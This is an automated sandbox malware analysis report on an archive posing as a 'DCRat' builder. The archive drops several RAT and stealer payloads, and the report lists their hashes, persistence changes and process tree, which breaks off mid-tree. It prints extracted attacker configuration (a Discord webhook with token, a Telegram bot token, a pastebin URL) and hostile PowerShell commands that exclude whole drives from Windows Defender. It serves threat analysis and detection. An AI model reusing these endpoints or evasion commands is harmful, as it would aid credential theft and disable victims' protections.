Analysis
  max time kernel: 129s
  max time network: 129s
  platform: windows7_x64
  resource: win7-20240611-en
  resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  submitted: 12-06-2024 19:27
Static task
  static1
Behavioral task
  behavioral1
  Sample: DCRat by C3lestial.fun.rar
  Resource: win7-20240611-en
Behavioral task
  behavioral2
  Sample: DCRat by C3lestial.fun.rar
  Resource: win10v2004-20240226-en
General
  Target: DCRat by C3lestial.fun.rar
  Size: 33.5MB
  MD5: 3112a622ece7c44b53c87e949af1ddd5
  SHA1: a770bef606f2ca9927a9500c20bdbf77cc0fc820
  SHA256: 94e6c2037598e41f66f734e1e1e0934c1a167f5a9825d221dcc7c8dbdaaca6ff
  SHA512: 6b5ded758418832c45c5c5273ddea5cc1a92c466a50289f9920b2d781f0de55199582ab4667e35155a592cd786f1498bf8c8199bf59212c13ae4ae6cee646139
  SSDEEP: 786432:7gF2TX5HO7SWzCzw2HjIDuaMivz67rEhebp02lUrSRPTz+:G2TX5O79Wz9w2IzfAb0rSRP2
Malware Config
Extracted: umbral
  https://discord.com/api/webhooks/1248497570939011083/iys0Q-I2H74ZeU8iK8mxnadLGnKvFVeC_daDGNMshULRzjYbAnJMv_etelbvONsTKIUG
Extracted: xworm
  Install_directory: %Temp%
  install_file: update.exe
  pastebin_url: https://pastebin.com/raw/CNZj0axn
  telegram: https://api.telegram.org/bot7009114103:AAGQ9PxSyhh1FE2I9esEeyfU9zAsNkooOqo/sendMessage?chat_id=1180155027
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.
Detect Umbral payload 4 IoCs
  resource  yara_rule
  behavioral1/files/0x000500000001935f-505.dat  family_umbral
  behavioral1/files/0x000400000001d3ca-590.dat  family_umbral
  behavioral1/memory/1712-593-0x0000000001250000-0x0000000001290000-memory.dmp  family_umbral
  behavioral1/memory/788-592-0x0000000000400000-0x00000000012FD000-memory.dmp  family_umbral
Detect Xworm Payload 2 IoCs
  resource  yara_rule
  behavioral1/files/0x000400000001d3bc-515.dat  family_xworm
  behavioral1/memory/572-527-0x00000000001B0000-0x00000000001C8000-memory.dmp  family_xworm
Modifies WinLogon for persistence 2 TTPs 13 IoCs
  description: Set value (str)
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
  Process: ComponentcrtSvc.exe
  The 13 recorded values are successive prefixes of the longest one (explorer.exe followed by 1 to 13 of the paths below, in this order). Longest recorded value:
    explorer.exe,
    "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe",
    "C:\Users\Admin\Local Settings\Idle.exe",
    "C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe",
    "C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe",
    "C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe",
    "C:\Program Files\Mozilla Firefox\fonts\wininit.exe",
    "C:\Windows\LiveKernelReports\cmd.exe",
    "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe",
    "C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe",
    "C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe",
    "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe",
    "C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe",
    "C:\Windows\SchCache\winlogon.exe"
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid_target: 568
  Process: schtasks.exe
  procid_target: 40
  pid (39 events, identical apart from the pid): 1928, 2188, 2468, 2024, 2792, 2296, 2408, 852, 868, 1244, 596, 2288, 1040, 2612, 1036, 584, 1592, 1308, 2336, 1620, 1092, 2204, 2356, 2884, 1688, 2096, 1588, 3016, 2980, 1028, 1148, 2712, 1424, 2380, 876, 2680, 336, 1516, 1556
DcRat 6 IoCs (yara matches for the DcRat signature listed above)
  resource  yara_rule
  behavioral1/files/0x000500000001935f-505.dat  dcrat
  behavioral1/files/0x000400000001d3be-521.dat  dcrat
  behavioral1/memory/788-592-0x0000000000400000-0x00000000012FD000-memory.dmp  dcrat
  behavioral1/files/0x000400000001d3c6-654.dat  dcrat
  behavioral1/memory/2320-655-0x0000000000200000-0x00000000003E4000-memory.dmp  dcrat
  behavioral1/memory/3020-915-0x00000000003D0000-0x00000000005B4000-memory.dmp  dcrat
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid / Process: powershell.exe with pids 2736, 2288, 2324, 1668, 1304, 992, 2388, 1476, 3068, 948, 2680, 1964, 2344, 840, 2816, 2248, 2780, 2296
Drops file in Drivers directory 1 IoCs
  description  ioc  Process
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  Umbral.exe
Drops startup file 3 IoCs
  description  ioc  Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe  creal.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk  XWorm.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk  XWorm.exe
Executes dropped EXE 9 IoCs
  pid / Process: 788 DCRat.exe, 2248 SHEETRAT.exe, 572 XWorm.exe, 2076 DCRat.exe, 1336 creal.exe, 1712 Umbral.exe, 1860 creal.exe, 2320 ComponentcrtSvc.exe, 3020 audiodg.exe
Loads dropped DLL 48 IoCs
  pid / Process (48 load events; each loading process listed once): 788 DCRat.exe, 1336 creal.exe, 1860 creal.exe, 3020 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 27 IoCs
  All entries are Set value (str). ComponentcrtSvc.exe writes each of the following 13 values under both
  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and
  \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run (26 IoCs):
    Idle = "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe"
    Idle = "C:\Users\Admin\Local Settings\Idle.exe"
    audiodg = "C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe"
    taskhost = "C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe"
    sppsvc = "C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe"
    wininit = "C:\Program Files\Mozilla Firefox\fonts\wininit.exe"
    cmd = "C:\Windows\LiveKernelReports\cmd.exe"
    creal = "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe"
    System = "C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe"
    csrss = "C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe"
    dwm = "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe"
    sppsvc = "C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe"
    winlogon = "C:\Windows\SchCache\winlogon.exe"
  XWorm.exe writes one value under \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run only (1 IoC):
    update = C:\Users\Admin\AppData\Local\Temp\update.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 28 IoCs
  flow / ioc: pastebin.com (flows 31, 33); discord.com (flows 15-30, 32, 34-42)
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc: 5 ip-api.com; 8 api.ipify.org; 9 api.ipify.org
Drops file in Program Files directory 12 IoCs
  description  ioc  Process (all by ComponentcrtSvc.exe)
  File created  C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe
  File created  C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe
  File created  C:\Program Files\Mozilla Firefox\fonts\wininit.exe
  File created  C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe
  File created  C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe
  File created  C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\6cb0b6c459d5d3
  File created  C:\Program Files (x86)\Microsoft.NET\RedistList\0a1fd5f707cd16
  File created  C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\b75386f1303e64
  File created  C:\Program Files (x86)\Windows Mail\en-US\0a1fd5f707cd16
  File created  C:\Program Files\Mozilla Firefox\fonts\56085415360792
  File created  C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe
  File created  C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\27d1bcfc3c54e0
Drops file in Windows directory 7 IoCs
  description  ioc  Process (all by ComponentcrtSvc.exe)
  File created  C:\Windows\ServiceProfiles\LocalService\Documents\42af1c969fbb7b
  File created  C:\Windows\LiveKernelReports\cmd.exe
  File created  C:\Windows\LiveKernelReports\ebf1f9fa8afd6d
  File created  C:\Windows\servicing\de-DE\audiodg.exe
  File created  C:\Windows\SchCache\winlogon.exe
  File created  C:\Windows\SchCache\cc11b995f2a76d
  File created  C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe
Detects Pyinstaller 2 IoCs
  resource  yara_rule
  behavioral1/files/0x000500000001935f-505.dat  pyinstaller
  behavioral1/files/0x000400000001d3c0-538.dat  pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 39 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid / Process: schtasks.exe with pids 1092, 1028, 2380, 584, 2288, 1036, 1308, 2356, 876, 1516, 868, 852, 2204, 2680, 1556, 2792, 3016, 2980, 336, 1588, 1688, 1148, 1244, 596, 1040, 2612, 2884, 2468, 2296, 1592, 2336, 1620, 2096, 2712, 2188, 2024, 2408, 1424, 1928
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine the installed video card.
  pid / Process: 848 wmic.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs
  pid / Process: 1900 tasklist.exe
Modifies registry class 64 IoCs
Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c00310000000000cb58e7b81000372d5a697000380008000400efbecb58e7b8cb58e7b82a0000000103010000000200000000000000000000000000000037002d005a0069007000000014000000 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 8800310000000000cb58b1bd110050524f4752417e310000700008000400efbeee3a851acb58b1bd2a0000003c000000000001000000000000000000460000000000500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" rundll32.exe Key 
created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications\7zFM.exe\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" rundll32.exe -
Runs ping.exe 1 TTPs 1 IoCs

| pid | Process |
|---|---|
| 2288 | PING.EXE |
Suspicious behavior: EnumeratesProcesses 64 IoCs

| pid | Process |
|---|---|
| 2320 | ComponentcrtSvc.exe |
| 1712 | Umbral.exe |
| 2736 | powershell.exe |
| 1956 | powershell.exe |
| 1668 | powershell.exe |
| 2780 | powershell.exe |
| 1304 | powershell.exe |
| 2532 | powershell.exe |
| 2816 | powershell.exe |
| 1964 | powershell.exe |
| 1476 | powershell.exe |
| 2296 | powershell.exe |
| 2288 | powershell.exe |
| 2248 | powershell.exe |
| 2344 | powershell.exe |
| 948 | powershell.exe |
| 3068 | powershell.exe |
| 992 | powershell.exe |
| 2324 | powershell.exe |
| 2388 | powershell.exe |
| 840 | powershell.exe |
| 2792 | powershell.exe |
| 2932 | taskmgr.exe (×2) |
| 2680 | powershell.exe |
| 2932 | taskmgr.exe |
| 2040 | powershell.exe |
| 2932 | taskmgr.exe (×3) |
| 3020 | audiodg.exe |
| 2932 | taskmgr.exe |
| 3020 | audiodg.exe (×8) |
| 2932 | taskmgr.exe (×24) |

Consecutive identical rows are collapsed; ×n is the repeat count (64 entries in total).
Suspicious behavior: GetForegroundWindowSpam 3 IoCs

| pid | Process |
|---|---|
| 2760 | rundll32.exe |
| 320 | 7zFM.exe |
| 2932 | taskmgr.exe |
Suspicious use of AdjustPrivilegeToken 64 IoCs

| description | pid | Process |
|---|---|---|
| Token: SeRestorePrivilege | 2740 | 7zFM.exe |
| Token: 35 | 2740 | 7zFM.exe |
| Token: SeSecurityPrivilege | 2740 | 7zFM.exe |
| Token: SeRestorePrivilege | 320 | 7zFM.exe |
| Token: 35 | 320 | 7zFM.exe |
| Token: SeDebugPrivilege | 572 | XWorm.exe |
| Token: SeDebugPrivilege | 1712 | Umbral.exe |
| Token: SeDebugPrivilege | 2320 | ComponentcrtSvc.exe |
| Token: SeIncreaseQuotaPrivilege | 308 | wmic.exe |
| Token: SeSecurityPrivilege | 308 | wmic.exe |
| Token: SeTakeOwnershipPrivilege | 308 | wmic.exe |
| Token: SeLoadDriverPrivilege | 308 | wmic.exe |
| Token: SeSystemProfilePrivilege | 308 | wmic.exe |
| Token: SeSystemtimePrivilege | 308 | wmic.exe |
| Token: SeProfSingleProcessPrivilege | 308 | wmic.exe |
| Token: SeIncBasePriorityPrivilege | 308 | wmic.exe |
| Token: SeCreatePagefilePrivilege | 308 | wmic.exe |
| Token: SeBackupPrivilege | 308 | wmic.exe |
| Token: SeRestorePrivilege | 308 | wmic.exe |
| Token: SeShutdownPrivilege | 308 | wmic.exe |
| Token: SeDebugPrivilege | 308 | wmic.exe |
| Token: SeSystemEnvironmentPrivilege | 308 | wmic.exe |
| Token: SeRemoteShutdownPrivilege | 308 | wmic.exe |
| Token: SeUndockPrivilege | 308 | wmic.exe |
| Token: SeManageVolumePrivilege | 308 | wmic.exe |
| Token: 33 | 308 | wmic.exe |
| Token: 34 | 308 | wmic.exe |
| Token: 35 | 308 | wmic.exe |
| Token: SeDebugPrivilege | 1900 | tasklist.exe |
| Token: SeDebugPrivilege | 2736 | powershell.exe |
| Token: SeDebugPrivilege | 1956 | powershell.exe |
| Token: SeDebugPrivilege | 1668 | powershell.exe |
| Token: SeDebugPrivilege | 2780 | powershell.exe |
| Token: SeDebugPrivilege | 1304 | powershell.exe |
| Token: SeDebugPrivilege | 2532 | powershell.exe |
| Token: SeDebugPrivilege | 2816 | powershell.exe |
| Token: SeDebugPrivilege | 1964 | powershell.exe |
| Token: SeDebugPrivilege | 1476 | powershell.exe |
| Token: SeDebugPrivilege | 2296 | powershell.exe |
| Token: SeDebugPrivilege | 2288 | powershell.exe |
| Token: SeDebugPrivilege | 2248 | powershell.exe |
| Token: SeDebugPrivilege | 2344 | powershell.exe |
| Token: SeDebugPrivilege | 948 | powershell.exe |
| Token: SeDebugPrivilege | 3068 | powershell.exe |

The 20 wmic.exe (PID 308) rows were logged twice in succession and are shown once here; 64 entries in total.
Suspicious use of FindShellTrayWindow 64 IoCs

| pid | Process |
|---|---|
| 2740 | 7zFM.exe (×2) |
| 320 | 7zFM.exe |
| 2932 | taskmgr.exe (×61) |

Consecutive identical rows are collapsed; ×n is the repeat count (64 entries in total).
Suspicious use of SendNotifyMessage 64 IoCs

| pid | Process |
|---|---|
| 2932 | taskmgr.exe (×64) |

Consecutive identical rows are collapsed; ×n is the repeat count (64 entries in total).
Suspicious use of SetWindowsHookEx 3 IoCs

| pid | Process |
|---|---|
| 2760 | rundll32.exe (×3) |

Consecutive identical rows are collapsed; ×n is the repeat count.
Suspicious use of WriteProcessMemory 64 IoCs

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 2032 wrote to memory of 2760 (×3) | 2032 | cmd.exe | 29 |
| PID 2760 wrote to memory of 2740 (×3) | 2760 | rundll32.exe | 30 |
| PID 788 wrote to memory of 2248 (×4) | 788 | DCRat.exe | 35 |
| PID 788 wrote to memory of 572 (×4) | 788 | DCRat.exe | 36 |
| PID 788 wrote to memory of 2076 (×4) | 788 | DCRat.exe | 37 |
| PID 2076 wrote to memory of 1124 (×4) | 2076 | DCRat.exe | 38 |
| PID 788 wrote to memory of 1336 (×4) | 788 | DCRat.exe | 39 |
| PID 788 wrote to memory of 1712 (×4) | 788 | DCRat.exe | 41 |
| PID 1336 wrote to memory of 1860 (×4) | 1336 | creal.exe | 42 |
| PID 1124 wrote to memory of 3020 (×4) | 1124 | WScript.exe | 155 |
| PID 3020 wrote to memory of 2320 (×4) | 3020 | cmd.exe | 45 |
| PID 1712 wrote to memory of 308 (×3) | 1712 | Umbral.exe | 46 |
| PID 1712 wrote to memory of 1608 (×3) | 1712 | Umbral.exe | 53 |
| PID 1712 wrote to memory of 2736 (×3) | 1712 | Umbral.exe | 60 |
| PID 1860 wrote to memory of 2820 (×4) | 1860 | creal.exe | 63 |
| PID 2820 wrote to memory of 1900 (×4) | 2820 | cmd.exe | 67 |
| PID 1712 wrote to memory of 1956 (×3) | 1712 | Umbral.exe | 82 |
| PID 572 wrote to memory of 1668 (×2) | 572 | XWorm.exe | 84 |

Consecutive identical rows are collapsed; ×n is the repeat count (64 entries in total).
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes 1 TTPs 1 IoCs

| pid | Process |
|---|---|
| 1608 | attrib.exe |
Processes

Each entry lists the process image, its command line, the signatures it matched and its PID; [n] is the depth of the process in the tree.

[1] C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DCRat by C3lestial.fun.rar"
    - Suspicious use of WriteProcessMemory
    PID: 2032

    [2] C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\DCRat by C3lestial.fun.rar
        - Modifies registry class
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID: 2760

        [3] C:\Program Files\7-Zip\7zFM.exe
            "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\DCRat by C3lestial.fun.rar"
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of FindShellTrayWindow
            PID: 2740

[1] C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\DCRat by C3lestial.fun\DCRat.exe"
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID: 320

[1] C:\Users\Admin\Desktop\DCRat by C3lestial.fun\DCRat.exe
    "C:\Users\Admin\Desktop\DCRat by C3lestial.fun\DCRat.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 788

    [2] C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe
        "C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe"
        - Executes dropped EXE
        PID: 2248

    [2] C:\Users\Admin\AppData\Local\Temp\XWorm.exe
        "C:\Users\Admin\AppData\Local\Temp\XWorm.exe"
        - Drops startup file
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 572

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1668

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2780

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\update.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1304

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'update.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            PID: 2680

    [2] C:\Users\Admin\AppData\Local\Temp\DCRat.exe
        "C:\Users\Admin\AppData\Local\Temp\DCRat.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        PID: 2076

        [3] C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\BlockComWinRuntime\lVOahidlbzbclXqy46W.vbe"
            - Suspicious use of WriteProcessMemory
            PID: 1124

            [4] C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\BlockComWinRuntime\FKb6YL6rIXHhsJz5oxJ.bat" "
                - Loads dropped DLL
                - Suspicious use of WriteProcessMemory
                PID: 3020

                [5] C:\BlockComWinRuntime\ComponentcrtSvc.exe
                    "C:\BlockComWinRuntime\ComponentcrtSvc.exe"
                    - Modifies WinLogon for persistence
                    - Executes dropped EXE
                    - Adds Run key to start application
                    - Drops file in Program Files directory
                    - Drops file in Windows directory
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    PID: 2320

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 1964

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 2296

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/BlockComWinRuntime/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        PID: 840

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 2816

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 2344

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        PID: 992

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        PID: 2388

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 1476

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 2288

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 2248

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        PID: 2324

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 3068

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        PID: 948

                    [6] C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ejfwe4E8I.bat"
                        PID: 1996

                        [7] C:\Windows\system32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            PID: 1252

                        [7] C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe
                            "C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe"
                            - Executes dropped EXE
                            - Suspicious behavior: EnumeratesProcesses
                            PID: 3020

    [2] C:\Users\Admin\AppData\Local\Temp\creal.exe
